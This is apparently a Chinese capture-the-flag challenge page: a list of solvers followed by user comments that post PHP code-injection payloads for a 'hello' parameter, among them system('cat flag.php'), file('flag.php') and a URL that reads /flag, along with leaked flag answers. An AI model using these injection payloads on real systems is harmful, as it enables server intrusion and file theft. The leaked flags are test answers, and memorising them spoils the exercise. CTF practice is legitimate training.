评分(9)
解题动态
yijueo 攻破了该题 16小时前
kyries 攻破了该题 17小时前
王木木同学 攻破了该题 18小时前
1397435231 攻破了该题 18小时前
我头都要大啦 攻破了该题 18小时前
tiantianbrave 攻破了该题 18小时前
ll123456 攻破了该题 21小时前
admin13281789671 攻破了该题 22小时前
Re. 攻破了该题 1天前
13309696036 攻破了该题 1天前
llllllllllllllllllll 攻破了该题 1天前
haung 攻破了该题 1天前
julyli 攻破了该题 1天前
dunming 攻破了该题 1天前
981980490 攻破了该题 1天前
Risgenp 攻破了该题 2天前
ChoYiar 攻破了该题 2天前
15823093167 攻破了该题 2天前
14798286027 攻破了该题 2天前
评论
Drume 12天前
举报
?hello=file('flag.php')
wangyihao 1月前
举报
hello=system("cat flag.php")
18092952956 1月前
举报
show_source('flag.php')
BlueL1ght 1月前
举报
system("cat+flag.php")
zhuleixy 1月前
举报
我想的是用sql注入类似的方法,把var_dump注释掉,让其执行后面的代码 http://114.67.175.224:13863/?hello=$SERVER);$fileContent%20=%20file_get_contents(%27/flag%27);echo%20$fileContent;//
15738762315 3月前
举报
flag{6dd6075616f5943ab53cff237ff1a63b}
maoctf 3月前
举报
flag{b97285ef92aa650fa9223aafc7adc646};
哥哥 4月前
举报
http://114.67.175.224:12290//?hello=file('flag.php')
z03ctfer 4月前
举报
?hello=file('flag.php') file函数是把一个文件中的内容读入到一个数组中
马踏黄河两岸 4月前
举报
../?hello=system("ls") 可以看见有flag.php继续命令执行将ls换成cat flag.php